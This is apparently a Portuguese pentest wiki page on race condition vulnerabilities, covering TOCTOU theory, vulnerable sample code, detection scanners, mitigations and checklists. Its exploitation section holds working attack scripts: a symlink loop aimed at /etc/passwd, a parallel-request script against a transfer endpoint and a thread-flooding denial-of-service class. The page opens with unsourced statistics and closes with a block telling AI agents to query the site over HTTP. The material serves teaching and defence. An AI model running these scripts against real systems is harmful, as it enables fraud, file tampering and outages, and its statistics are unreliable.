# Race Condition

Race Condition é uma vulnerabilidade que ocorre quando o resultado de uma operação depende da sequência ou timing de eventos simultâneos que o sistema não consegue controlar adequadamente.

### **Princípio de Funcionamento**

```
Processo A: Lê recurso X (valor = 100)
Processo B: Lê recurso X (valor = 100)
Processo A: Modifica X (100 → 150)
Processo B: Modifica X (100 → 50)
Resultado: X = 50 (perdeu a modificação de A)
```

### **Características Principais**

```
🕒 **Temporal**: Depende de timing e concorrência
🔀 **Não Determinístico**: Resultados variam entre execuções
🎯 **Sutil**: Difícil de reproduzir e depurar
⚡ **Escalável**: Afeta sistemas com alta concorrência
```

### **Estatísticas Relevantes**

```bash
# Dados de segurança (2024)
- 15% das vulnerabilidades em sistemas concorrentes
- 40% aumento em ataques TOCTOU nos últimos 2 anos
- 60% dos sistemas financeiros têm race conditions potenciais
- MTTD (Mean Time To Detect): 180+ dias
```

***

## **🎯 Tipos e Classificações**

### **1. TOCTOU (Time-of-Check-Time-of-Use)**

```python
# Padrão vulnerável TOCTOU
def transfer_funds(user_id, amount, target_account):
    # TIME-OF-CHECK
    if get_balance(user_id) >= amount:
        # Janela de vulnerabilidade
        # TIME-OF-USE
        debit_account(user_id, amount)
        credit_account(target_account, amount)
    else:
        raise InsufficientFundsError()
```

### **2. Condições de Corrida de Dados**

```java
// Exemplo em Java - contador não thread-safe
public class VulnerableCounter {
    private int count = 0;
    
    public void increment() {
        count++;  // Não atômico: read-modify-write
    }
    
    // Em ambiente concorrente, podem ocorrer:
    // Thread A: lê count (0)
    // Thread B: lê count (0)  
    // Thread A: incrementa (1)
    // Thread B: incrementa (1)
    // Resultado: count = 1 (deveria ser 2)
}
```

### **3. Condições de Corrida de Sincronização**

```c
// Uso incorreto de mutex
pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
int shared_resource = 0;

void* worker(void* arg) {
    if (/* condição */) {
        pthread_mutex_lock(&lock);
        // Deadlock potencial ou double-lock
    }
    // Esqueceu de fazer unlock em alguns casos
}
```

### **Classificação por Impacto**

```yaml
severity_levels:
  critical:
    - "Financial transactions"
    - "Access control bypass"
    - "Privilege escalation"
  
  high:
    - "Data corruption"
    - "Authentication bypass"
    - "Resource exhaustion"
  
  medium:
    - "Denial of Service"
    - "Information disclosure"
    - "Logic flaws"
  
  low:
    - "UI glitches"
    - "Temporary inconsistencies"
```

***

## **🏢 Contextos de Ataque**

### **Sistemas Operacionais e File Systems**

```c
// TOCTOU em operações de arquivo
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>

void vulnerable_file_operation(const char* filename) {
    struct stat st;
    
    // TIME-OF-CHECK
    if (stat(filename, &st) == 0) {
        // Janela de vulnerabilidade
        // Atacante pode substituir o arquivo por um symlink
        usleep(1000); // Janela de oportunidade
        
        // TIME-OF-USE  
        FILE* fp = fopen(filename, "w");
        if (fp) {
            // Escreve no arquivo (potencialmente em local diferente)
            fputs("sensitive data", fp);
            fclose(fp);
        }
    }
}
```

### **Aplicações Web e APIs**

```python
from flask import Flask, request, session
import sqlite3

app = Flask(__name__)

# Vulnerabilidade em sistema de cupons
@app.route('/apply_coupon', methods=['POST'])
def apply_coupon():
    coupon_code = request.json.get('coupon')
    user_id = session.get('user_id')
    
    # TIME-OF-CHECK
    coupon = db.execute(
        "SELECT * FROM coupons WHERE code = ? AND uses < max_uses",
        (coupon_code,)
    ).fetchone()
    
    if coupon:
        # Janela de vulnerabilidade - múltiplas requisições
        # podem passar pela verificação simultaneamente
        
        # TIME-OF-USE
        db.execute(
            "UPDATE coupons SET uses = uses + 1 WHERE code = ?",
            (coupon_code,)
        )
        db.commit()
        
        return {"success": True, "discount": coupon['discount']}
    
    return {"success": False}
```

### **Bancos de Dados e Transações**

```sql
-- Não usar transações adequadamente pode causar race conditions
-- Sessão 1
BEGIN TRANSACTION;
SELECT balance FROM accounts WHERE id = 1; -- Retorna 100
-- Sessão 2 também lê 100 antes da Sessão 1 commitar
UPDATE accounts SET balance = balance - 50 WHERE id = 1;
COMMIT;

-- Perda de atualização ocorre
```

### **Sistemas Distribuídos**

```python
# Cache invalidation race condition
import redis
import requests

def get_user_profile(user_id):
    cache_key = f"user_profile:{user_id}"
    
    # TIME-OF-CHECK no cache
    cached_data = redis_client.get(cache_key)
    if not cached_data:
        # Janela onde múltiplas requisições podem
        # causar cache stampede
        profile = fetch_from_database(user_id)
        
        # TIME-OF-USE no cache
        redis_client.setex(cache_key, 3600, profile)
        return profile
    
    return cached_data

def fetch_from_database(user_id):
    # Operação pesada no banco
    time.sleep(2)
    return db.query("SELECT * FROM users WHERE id = ?", user_id)
```

***

## **🔎 Detecção e Identificação**

### **Padrões de Código Vulnerável**

#### **1. Identificação de TOCTOU**

```python
# Padrões para buscar em code review
vulnerable_patterns = [
    # Verificação seguida de uso sem locking
    r"if\s*\(.*access.*\).*{.*open.*}",
    r"check.*permission.*then.*access",
    r"stat.*then.*fopen",
    r"exists.*then.*delete",
    
    # Operações não atômicas
    r"read.*then.*write",
    r"check.*balance.*then.*transfer",
    r"validate.*then.*execute"
]
```

#### **2. Análise Estática Automatizada**

```python
#!/usr/bin/env python3
# race_condition_scanner.py

import ast
import re
from typing import List, Dict

class RaceConditionScanner(ast.NodeVisitor):
    def __init__(self):
        self.vulnerabilities = []
        self.current_file = ""
    
    def visit_FunctionDef(self, node):
        """Analisar função por padrões de race condition"""
        function_code = ast.unparse(node)
        
        # Padrão TOCTOU
        if self.detect_toctou_pattern(function_code):
            self.vulnerabilities.append({
                'type': 'TOCTOU',
                'file': self.current_file,
                'line': node.lineno,
                'function': node.name,
                'description': 'Time-of-Check-Time-of-Use vulnerability detected'
            })
        
        # Padrão de operação não atômica
        if self.detect_non_atomic_pattern(function_code):
            self.vulnerabilities.append({
                'type': 'NON_ATOMIC',
                'file': self.current_file,
                'line': node.lineno,
                'function': node.name,
                'description': 'Non-atomic operation in concurrent context'
            })
        
        self.generic_visit(node)
    
    def detect_toctou_pattern(self, code: str) -> bool:
        """Detectar padrão TOCTOU no código"""
        patterns = [
            # File operations
            r"os\.path\.exists.*open\(",
            r"os\.access.*open\(",
            r"stat\.*fopen",
            
            # Business logic
            r"check.*if.*update",
            r"validate.*then.*use",
            r"select.*for.*update.*without.*transaction"
        ]
        
        return any(re.search(pattern, code, re.IGNORECASE | re.DOTALL) 
                  for pattern in patterns)
    
    def detect_non_atomic_pattern(self, code: str) -> bool:
        """Detectar operações não atômicas"""
        patterns = [
            r"read.*write",  # Read-modify-write
            r"check.*update", # Check-then-act
            r"get.*set",     # Get-modify-set
        ]
        
        return any(re.search(pattern, code, re.IGNORECASE | re.DOTALL)
                  for pattern in patterns)
    
    def scan_file(self, file_path: str):
        """Escane arquivo Python"""
        self.current_file = file_path
        try:
            with open(file_path, 'r', encoding='utf-8') as f:
                content = f.read()
                tree = ast.parse(content)
                self.visit(tree)
        except Exception as e:
            print(f"Error scanning {file_path}: {e}")

# Uso do scanner
scanner = RaceConditionScanner()
scanner.scan_file("vulnerable_app.py")
for vuln in scanner.vulnerabilities:
    print(f"🚨 {vuln['type']} in {vuln['file']}:{vuln['line']}")
```

### **Testes de Concorrência**

#### **1. Framework de Teste de Race Condition**

```python
import threading
import time
import random
from concurrent.futures import ThreadPoolExecutor

class RaceConditionTester:
    def __init__(self, target_function, num_threads=10, iterations=100):
        self.target_function = target_function
        self.num_threads = num_threads
        self.iterations = iterations
        self.results = []
        self.errors = []
    
    def test_race_condition(self, *args, **kwargs):
        """Executar teste de concorrência"""
        with ThreadPoolExecutor(max_workers=self.num_threads) as executor:
            futures = []
            
            for i in range(self.iterations):
                # Adicionar variação de timing
                delay = random.uniform(0, 0.1)
                future = executor.submit(self._execute_with_delay, 
                                       self.target_function, delay, *args, **kwargs)
                futures.append(future)
            
            # Coletar resultados
            for future in futures:
                try:
                    result = future.result()
                    self.results.append(result)
                except Exception as e:
                    self.errors.append(str(e))
        
        return self.analyze_results()
    
    def _execute_with_delay(self, func, delay, *args, **kwargs):
        """Executar função com delay aleatório"""
        time.sleep(delay)
        return func(*args, **kwargs)
    
    def analyze_results(self):
        """Analisar resultados para detectar inconsistências"""
        if not self.results:
            return {"status": "ERROR", "errors": self.errors}
        
        # Verificar consistência dos resultados
        unique_results = set(self.results)
        
        analysis = {
            "status": "PASS" if len(unique_results) == 1 else "RACE_CONDITION_DETECTED",
            "total_executions": len(self.results),
            "unique_results": len(unique_results),
            "results_samples": list(unique_results)[:5],
            "error_count": len(self.errors)
        }
        
        return analysis

# Exemplo de uso
def vulnerable_transfer(account_balance, amount):
    # Simulação de operação não atômica
    if account_balance >= amount:
        time.sleep(0.01)  # Janela de vulnerabilidade
        account_balance -= amount
        return account_balance
    return account_balance

# Testar a função vulnerável
tester = RaceConditionTester(vulnerable_transfer)
result = tester.test_race_condition(100, 10)
print(f"Test Result: {result}")
```

#### **2. Teste de Estresse com HTTP**

```python
import requests
import threading
import json

class HTTPRaceConditionTester:
    def __init__(self, url, headers=None):
        self.url = url
        self.headers = headers or {}
        self.responses = []
    
    def send_parallel_requests(self, num_requests, data):
        """Enviar múltiplas requisições em paralelo"""
        threads = []
        
        for i in range(num_requests):
            thread = threading.Thread(
                target=self._send_request,
                args=(data,)
            )
            threads.append(thread)
            thread.start()
        
        for thread in threads:
            thread.join()
        
        return self.analyze_responses()
    
    def _send_request(self, data):
        """Enviar requisição individual"""
        try:
            response = requests.post(
                self.url,
                json=data,
                headers=self.headers
            )
            self.responses.append({
                'status_code': response.status_code,
                'content': response.json() if response.content else {}
            })
        except Exception as e:
            self.responses.append({'error': str(e)})
    
    def analyze_responses(self):
        """Analisar respostas para detectar race conditions"""
        success_count = sum(1 for r in self.responses 
                          if r.get('status_code') == 200)
        
        # Verificar inconsistências em respostas bem-sucedidas
        successful_responses = [
            r for r in self.responses 
            if r.get('status_code') == 200
        ]
        
        # Se houver múltiplas respostas bem-sucedidas com dados inconsistentes
        # pode indicar race condition
        unique_contents = set(
            json.dumps(r.get('content', {}), sort_keys=True) 
            for r in successful_responses
        )
        
        return {
            'total_requests': len(self.responses),
            'successful_requests': success_count,
            'unique_responses': len(unique_contents),
            'potential_race_condition': len(unique_contents) > 1
        }

# Exemplo: Testar endpoint de cupom
tester = HTTPRaceConditionTester(
    "https://api.example.com/apply_coupon",
    headers={"Authorization": "Bearer token123"}
)

result = tester.send_parallel_requests(
    num_requests=10,
    data={"coupon_code": "SUMMER2024"}
)
print(f"Race condition test: {result}")
```

***

## **💥 Exploração Avançada**

### **Técnicas de Exploração**

#### **1. Exploração TOCTOU em File Systems**

```bash
#!/bin/bash
# exploit_toctou.sh

# Exploração de TOCTOU em operações de arquivo
TARGET_FILE="/tmp/sensitive_data"
SYMLINK_TARGET="/etc/passwd"

# Loop de exploração
while true; do
    # Cria symlink malicioso
    ln -sf "$SYMLINK_TARGET" "$TARGET_FILE" &
    
    # Executa aplicação vulnerável em paralelo
    ./vulnerable_app "$TARGET_FILE" &
    
    # Limpa para próxima iteração
    rm -f "$TARGET_FILE" &
    
    sleep 0.001
done
```

#### **2. Race Condition em Aplicações Web**

```python
import asyncio
import aiohttp

async def exploit_web_race_condition(url, session_data, num_requests=50):
    """Explorar race condition em aplicação web"""
    
    async def make_request(session, request_id):
        async with session.post(url, json=session_data) as response:
            return await response.json()
    
    async with aiohttp.ClientSession() as session:
        # Enviar múltiplas requisições simultaneamente
        tasks = [
            make_request(session, i) 
            for i in range(num_requests)
        ]
        
        responses = await asyncio.gather(*tasks)
        
        # Analisar resultados
        successful_operations = [
            r for r in responses 
            if r.get('success')
        ]
        
        print(f"Operações bem-sucedidas: {len(successful_operations)}")
        print(f"Total de requisições: {len(responses)}")
        
        if len(successful_operations) > 1:
            print("🎯 Race condition explorada com sucesso!")
        
        return responses

# Uso
asyncio.run(exploit_web_race_condition(
    "https://api.example.com/transfer",
    {"from": "account_a", "to": "account_b", "amount": 100},
    num_requests=100
))
```

#### **3. Ataque de Exaustão de Recursos**

```python
import threading
import requests

class ResourceExhaustionAttack:
    def __init__(self, target_url, max_threads=1000):
        self.target_url = target_url
        self.max_threads = max_threads
        self.active_threads = 0
    
    def attack(self):
        """Executar ataque de exaustão de recursos"""
        print(f"Iniciando ataque em {self.target_url}")
        
        while self.active_threads < self.max_threads:
            thread = threading.Thread(target=self._worker)
            thread.daemon = True
            thread.start()
            self.active_threads += 1
        
        # Manter ataque rodando
        try:
            while True:
                pass
        except KeyboardInterrupt:
            print("Ataque interrompido")
    
    def _worker(self):
        """Worker para consumir recursos"""
        while True:
            try:
                # Consumir recursos do alvo
                response = requests.get(self.target_url, timeout=5)
                
                # Se a aplicação tiver race condition em alocação de recursos,
                # isso pode causar crash ou comportamento inesperado
                
            except requests.RequestException:
                continue

# Uso (apenas para testes educacionais)
# attack = ResourceExhaustionAttack("http://vulnerable-app.com/api/resource")
# attack.attack()
```

### **Cenários de Exploração do Mundo Real**

#### **1. Sistema Bancário - Transferência Duplicada**

```python
# Simulação de vulnerabilidade em sistema bancário
import threading
import time

class VulnerableBank:
    def __init__(self):
        self.accounts = {'user1': 1000, 'user2': 500}
        self.lock = threading.Lock()
    
    def transfer_without_proper_lock(self, from_user, to_user, amount):
        # VERIFICAÇÃO (não atomicamente protegida)
        if self.accounts[from_user] >= amount:
            # JANELA DE VULNERABILIDADE
            time.sleep(0.01)  # Simula processamento
            
            # ATUALIZAÇÃO
            self.accounts[from_user] -= amount
            self.accounts[to_user] += amount
            return True
        return False

# Exploração
bank = VulnerableBank()

def exploit_transfer():
    bank.transfer_without_proper_lock('user1', 'user2', 600)

# Múltiplas threads executando simultaneamente
threads = []
for i in range(5):
    t = threading.Thread(target=exploit_transfer)
    threads.append(t)
    t.start()

for t in threads:
    t.join()

print(f"Saldo final user1: {bank.accounts['user1']}")  # Pode ser negativo!
```

#### **2. Sistema de Votos/Eleições**

```python
class VotingSystem:
    def __init__(self):
        self.votes = {}
        self.voted = set()
    
    def vote_vulnerable(self, user_id, candidate):
        # TOCTOU em verificação de voto único
        if user_id not in self.voted:  # TIME-OF-CHECK
            # Janela de vulnerabilidade
            time.sleep(0.001)
            
            self.voted.add(user_id)    # TIME-OF-USE
            self.votes[candidate] = self.votes.get(candidate, 0) + 1
            return True
        return False

# Exploração permitindo votos múltiplos
voting = VotingSystem()

def cast_vote(user_id):
    voting.vote_vulnerable(user_id, "Candidate_A")

# Usuário pode votar múltiplas vezes
threads = []
for i in range(10):  # 10 votos do mesmo usuário
    t = threading.Thread(target=cast_vote, args=("user123",))
    threads.append(t)
    t.start()
```

***

## **🛡️ Mitigação e Prevenção**

### **Padrões de Design Seguros**

#### **1. Locking e Sincronização**

```python
import threading
from contextlib import contextmanager

class SecureBankSystem:
    def __init__(self):
        self.accounts = {'user1': 1000, 'user2': 500}
        self.locks = {user: threading.Lock() for user in self.accounts}
    
    @contextmanager
    def account_lock(self, user_id):
        """Context manager para locking de conta"""
        lock = self.locks.get(user_id)
        if lock:
            lock.acquire()
            try:
                yield
            finally:
                lock.release()
        else:
            yield
    
    def secure_transfer(self, from_user, to_user, amount):
        # Usar locking para operação atômica
        with self.account_lock(from_user), self.account_lock(to_user):
            if self.accounts[from_user] >= amount:
                self.accounts[from_user] -= amount
                self.accounts[to_user] += amount
                return True
        return False
```

#### **2. Operações Atômicas**

```python
import sqlite3
from threading import Lock

class AtomicDatabaseOperations:
    def __init__(self, db_path):
        self.db_path = db_path
        self.connection_lock = Lock()
    
    def atomic_coupon_use(self, coupon_code):
        """Uso atômico de cupom usando transações de banco"""
        with self.connection_lock:
            conn = sqlite3.connect(self.db_path)
            try:
                conn.execute("BEGIN IMMEDIATE TRANSACTION")
                
                # Verificação e atualização na mesma transação
                cursor = conn.execute(
                    "SELECT uses, max_uses FROM coupons WHERE code = ?",
                    (coupon_code,)
                )
                result = cursor.fetchone()
                
                if result and result[0] < result[1]:
                    conn.execute(
                        "UPDATE coupons SET uses = uses + 1 WHERE code = ?",
                        (coupon_code,)
                    )
                    conn.commit()
                    return True
                else:
                    conn.rollback()
                    return False
                    
            except Exception as e:
                conn.rollback()
                raise e
            finally:
                conn.close()
```

#### **3. Versionamento Otimista (Optimistic Locking)**

```python
class OptimisticLockingSystem:
    def __init__(self):
        self.records = {}
        self.versions = {}  # version stamps
    
    def update_with_optimistic_lock(self, record_id, update_func):
        """Atualização com versionamento otimista"""
        max_retries = 3
        retries = 0
        
        while retries < max_retries:
            current_version = self.versions.get(record_id, 0)
            current_data = self.records.get(record_id, {})
            
            # Aplicar atualização
            new_data = update_func(current_data.copy())
            
            # Tentar commit com verificação de versão
            if self._try_commit(record_id, current_version, new_data):
                return True
            
            retries += 1
        
        return False  # Muitas tentativas, possivelmente alta concorrência
    
    def _try_commit(self, record_id, expected_version, new_data):
        """Tentar commit verificando se a versão ainda é a esperada"""
        # Em sistema real, isso seria uma operação atômica no banco
        if self.versions.get(record_id, 0) == expected_version:
            self.records[record_id] = new_data
            self.versions[record_id] = expected_version + 1
            return True
        return False
```

### **Padrões Específicos por Contexto**

#### **1. File Systems - Operações Atômicas**

```python
import os
import tempfile
import errno

class SecureFileOperations:
    @staticmethod
    def atomic_file_write(filename, data):
        """Escrita atômica de arquivo usando temporary rename"""
        # Escrever em arquivo temporário
        temp_fd, temp_path = tempfile.mkstemp(dir=os.path.dirname(filename))
        try:
            with os.fdopen(temp_fd, 'w') as f:
                f.write(data)
                f.flush()
                os.fsync(f.fileno())
            
            # Renomear atômico (função atômica na maioria dos filesystems)
            os.rename(temp_path, filename)
        except Exception:
            # Limpeza em caso de erro
            try:
                os.unlink(temp_path)
            except OSError:
                pass
            raise
    
    @staticmethod
    def secure_file_open(filename, mode):
        """Abertura segura de arquivo verificando symlinks"""
        # Usar O_NOFOLLOW para evitar symlink attacks
        if 'r' in mode:
            fd = os.open(filename, os.O_RDONLY | os.O_NOFOLLOW)
        else:
            fd = os.open(filename, os.O_WRONLY | os.O_CREAT | os.O_NOFOLLOW, 0o600)
        
        return os.fdopen(fd, mode)
```

#### **2. Web Applications - Rate Limiting e Locking**

```python
from flask import Flask, request
import redis
import threading
from contextlib import contextmanager

app = Flask(__name__)
redis_client = redis.Redis()

class DistributedLock:
    def __init__(self, redis_client, lock_name, timeout=10):
        self.redis = redis_client
        self.lock_name = f"lock:{lock_name}"
        self.timeout = timeout
    
    @contextmanager
    def acquire(self):
        """Adquirir lock distribuído"""
        import time
        start_time = time.time()
        
        while time.time() - start_time < self.timeout:
            # Tentar adquirir lock
            if self.redis.set(self.lock_name, "locked", nx=True, ex=10):
                try:
                    yield
                    return
                finally:
                    self.redis.delete(self.lock_name)
            time.sleep(0.1)
        
        raise TimeoutError("Could not acquire lock")

@app.route('/secure_transfer', methods=['POST'])
def secure_transfer():
    data = request.json
    from_account = data['from']
    to_account = data['to']
    amount = data['amount']
    
    # Usar lock distribuído para prevenir race conditions
    lock_name = f"transfer_{from_account}_{to_account}"
    
    try:
        with DistributedLock(redis_client, lock_name):
            # Operação atômica protegida
            return perform_transfer(from_account, to_account, amount)
    except TimeoutError:
        return {"error": "Operation in progress, please try again"}, 429
```

#### **3. Database - Transações e Isolation Levels**

```sql
-- Usar transações com isolation level apropriado
BEGIN TRANSACTION ISOLATION LEVEL SERIALIZABLE;

-- Operações atômicas dentro da transação
SELECT balance FROM accounts WHERE id = 1 FOR UPDATE;

UPDATE accounts SET balance = balance - 100 WHERE id = 1;
UPDATE accounts SET balance = balance + 100 WHERE id = 2;

-- Verificar constraints
SELECT 1 FROM accounts WHERE balance >= 0;

COMMIT;

-- Em caso de falha na verificação:
ROLLBACK;
```

### **Ferramentas de Prevenção**

#### **1. Static Analysis Tools**

```yaml
# .race-condition-rules.yml
static_analysis_rules:
  toctou_patterns:
    - "file_exists_then_open"
    - "check_then_use"
    - "validate_then_execute"
  
  non_atomic_operations:
    - "read_modify_write"
    - "check_then_act" 
    - "test_then_set"
  
  concurrency_issues:
    - "missing_synchronization"
    - "incorrect_lock_usage"
    - "deadlock_potential"
  
  framework_specific:
    - "django_race_conditions"
    - "flask_session_races"
    - "nodejs_async_issues"
```

#### **2. Runtime Protection**

```python
import threading
import functools
import time

def synchronized(lock_name):
    """Decorator para sincronizar métodos"""
    def decorator(func):
        @functools.wraps(func)
        def wrapper(self, *args, **kwargs):
            lock = getattr(self, lock_name)
            with lock:
                return func(self, *args, **kwargs)
        return wrapper
    return decorator

def rate_limit(max_calls, period):
    """Decorator para rate limiting"""
    def decorator(func):
        calls = []
        lock = threading.Lock()
        
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            with lock:
                now = time.time()
                # Remover chamadas antigas
                calls[:] = [call_time for call_time in calls 
                           if now - call_time < period]
                
                if len(calls) >= max_calls:
                    raise RuntimeError("Rate limit exceeded")
                
                calls.append(now)
            
            return func(*args, **kwargs)
        return wrapper
    return decorator

# Uso em classe segura
class SecureAPI:
    def __init__(self):
        self.transfer_lock = threading.Lock()
    
    @synchronized('transfer_lock')
    @rate_limit(max_calls=10, period=60)  # 10 chamadas por minuto
    def process_transfer(self, from_acc, to_acc, amount):
        # Operação segura contra race conditions
        pass
```

***

## **🔧 Ferramentas e Testes**

### **Ferramentas de Detecção**

#### **1. ThreadSanitizer (TSan)**

```cpp
// Compilar com: -fsanitize=thread
#include <pthread.h>
#include <iostream>

int shared_data = 0;

void* worker(void* arg) {
    for (int i = 0; i < 1000; ++i) {
        shared_data++;  // Race condition!
    }
    return nullptr;
}

int main() {
    pthread_t t1, t2;
    pthread_create(&t1, nullptr, worker, nullptr);
    pthread_create(&t2, nullptr, worker, nullptr);
    
    pthread_join(t1, nullptr);
    pthread_join(t2, nullptr);
    
    std::cout << "Shared data: " << shared_data << std::endl;
    return 0;
}
```

#### **2. Custom Race Condition Detector**

```python
#!/usr/bin/env python3
# advanced_race_detector.py

import threading
import sys
import time
from functools import wraps

class RaceConditionDetector:
    def __init__(self):
        self.access_log = []
        self.lock = threading.Lock()
        self.detected_races = []
    
    def monitor_variable(self, var_name):
        """Decorator para monitorar acesso a variável"""
        def decorator(func):
            @wraps(func)
            def wrapper(*args, **kwargs):
                thread_name = threading.current_thread().name
                timestamp = time.time()
                
                # Log de acesso
                with self.lock:
                    self.access_log.append({
                        'thread': thread_name,
                        'variable': var_name,
                        'time': timestamp,
                        'operation': 'access'
                    })
                
                # Detectar acessos concorrentes
                self._detect_concurrent_access(var_name, timestamp)
                
                return func(*args, **kwargs)
            return wrapper
        return decorator
    
    def _detect_concurrent_access(self, var_name, timestamp):
        """Detectar acessos concorrentes à mesma variável"""
        with self.lock:
            recent_accesses = [
                access for access in self.access_log
                if access['variable'] == var_name and
                timestamp - access['time'] < 0.001  # 1ms window
            ]
            
            if len(recent_accesses) > 1:
                # Possível race condition detectada
                race_info = {
                    'variable': var_name,
                    'timestamp': timestamp,
                    'concurrent_accesses': recent_accesses
                }
                
                if race_info not in self.detected_races:
                    self.detected_races.append(race_info)
                    print(f"🚨 RACE CONDITION DETECTED: {var_name}")
                    print(f"   Concurrent accesses: {len(recent_accesses)}")
    
    def generate_report(self):
        """Gerar relatório de race conditions detectadas"""
        report = {
            'total_operations': len(self.access_log),
            'races_detected': len(self.detected_races),
            'details': self.detected_races
        }
        return report

# Uso
detector = RaceConditionDetector()

@detector.monitor_variable('shared_counter')
def increment_counter():
    global shared_counter
    shared_counter += 1

# Teste
shared_counter = 0
threads = []

for i in range(10):
    t = threading.Thread(target=increment_counter)
    threads.append(t)
    t.start()

for t in threads:
    t.join()

print(detector.generate_report())
```

### **Ferramentas de Teste**

#### **1. Framework de Teste de Concorrência**

```python
import concurrent.futures
import time
import random

class ConcurrencyTestFramework:
    def __init__(self):
        self.test_cases = []
    
    def add_test_case(self, name, target_function, setup=None, 
                     teardown=None, iterations=100, max_workers=10):
        """Adicionar caso de teste"""
        self.test_cases.append({
            'name': name,
            'target': target_function,
            'setup': setup,
            'teardown': teardown,
            'iterations': iterations,
            'max_workers': max_workers
        })
    
    def run_tests(self):
        """Executar todos os testes de concorrência"""
        results = {}
        
        for test_case in self.test_cases:
            print(f"Running: {test_case['name']}")
            result = self._run_single_test(test_case)
            results[test_case['name']] = result
        
        return self._generate_test_report(results)
    
    def _run_single_test(self, test_case):
        """Executar teste individual"""
        # Setup
        if test_case['setup']:
            test_case['setup']()
        
        results = []
        with concurrent.futures.ThreadPoolExecutor(
            max_workers=test_case['max_workers']) as executor:
            
            # Submeter tarefas
            futures = [
                executor.submit(self._execute_with_variation, 
                              test_case['target'])
                for _ in range(test_case['iterations'])
            ]
            
            # Coletar resultados
            for future in concurrent.futures.as_completed(futures):
                try:
                    result = future.result()
                    results.append(result)
                except Exception as e:
                    results.append({'error': str(e)})
        
        # Teardown
        if test_case['teardown']:
            test_case['teardown']()
        
        return self._analyze_test_results(results)
    
    def _execute_with_variation(self, target_function):
        """Executar função com variação de timing"""
        # Adicionar variação aleatória
        delay = random.uniform(0, 0.05)
        time.sleep(delay)
        
        return target_function()
    
    def _analyze_test_results(self, results):
        """Analisar resultados do teste"""
        # Contar resultados únicos
        unique_results = set(str(r) for r in results)
        
        # Verificar por erros
        errors = [r for r in results if 'error' in r]
        
        return {
            'total_executions': len(results),
            'unique_results': len(unique_results),
            'errors': len(errors),
            'potential_race_condition': len(unique_results) > 1,
            'sample_results': list(unique_results)[:3]
        }

# Exemplo de uso
framework = ConcurrencyTestFramework()

def vulnerable_function():
    # Simular função vulnerável
    global shared_state
    if not hasattr(vulnerable_function, 'local_state'):
        vulnerable_function.local_state = 0
    
    vulnerable_function.local_state += 1
    return vulnerable_function.local_state

framework.add_test_case(
    "Vulnerable Counter Test",
    vulnerable_function,
    iterations=1000,
    max_workers=50
)

results = framework.run_tests()
print(results)
```

***

## **📋 Checklists de Segurança**

### **Checklist de Prevenção**

* [ ] **Locking e Sincronização**
  * [ ] Usar locks para operações críticas
  * [ ] Implementar timeouts para locks
  * [ ] Evitar deadlocks (lock ordering)
  * [ ] Usar lock-free algorithms quando apropriado
* [ ] **Operações Atômicas**
  * [ ] Usar transações de banco de dados
  * [ ] Implementar operações atômicas no filesystem
  * [ ] Usar tipos atômicos quando disponíveis
  * [ ] Verificar atomicidade de APIs
* [ ] **Design do Sistema**
  * [ ] Minimizar janelas de vulnerabilidade
  * [ ] Implementar idempotência
  * [ ] Usar versionamento otimista/pessimista
  * [ ] Design para falha segura

### **Checklist de Code Review**

* [ ] **Padrões TOCTOU**
  * [ ] Verificar check-then-use patterns
  * [ ] Identificar file operations sem locking
  * [ ] Revisar validações seguidas de operações
* [ ] **Concorrência**
  * [ ] Verificar shared state access
  * [ ] Identificar missing synchronization
  * [ ] Revisar lock acquisition/release
  * [ ] Verificar thread-safe data structures

### **Checklist de Testes**

* [ ] **Testes de Concorrência**
  * [ ] Executar testes com múltiplas threads
  * [ ] Testar com variação de timing
  * [ ] Verificar consistência de resultados
  * [ ] Testar condições de estresse

***

## **⚠️ Considerações Finais**

### **Lições Aprendidas**

```yaml
key_lessons:
  design:
    - "Assume que múltiplas threads executarão simultaneamente"
    - "Minimizar estado compartilhado"
    - "Preferir imutabilidade"
  
  implementation: 
    - "Sempre usar sincronização para operações críticas"
    - "Testar extensivamente em ambiente concorrente"
    - "Monitorar por condições de corrida em produção"
  
  testing:
    - "Testes de concorrência são essenciais"
    - "Usar ferramentas de detecção automática"
    - "Incluir race conditions em threat models"
```

### **Tendências Emergentes**

* **Microservices**: Race conditions em sistemas distribuídos
* **Serverless**: Concorrência em funções stateless
* **Real-time Systems**: Timing crítico em aplicações IoT
* **Machine Learning**: Race conditions em treinamento distribuído

### **Recursos Recomendados**

* **Books**: "Java Concurrency in Practice", "The Art of Multiprocessor Programming"
* **Tools**: ThreadSanitizer, Helgrind, Intel Inspector
* **Standards**: POSIX threads, Java Memory Model, C++ Memory Model

**🔐 Lembre-se**: Race conditions são algumas das vulnerabilidades mais difíceis de detectar e corrigir. Prevenção através de design adequado, coupled com testes rigorosos, é a abordagem mais eficaz.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xmorte.gitbook.io/bibliadopentestbr/tecnicas/web/server-side-infraestrutura-web/race-condition.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
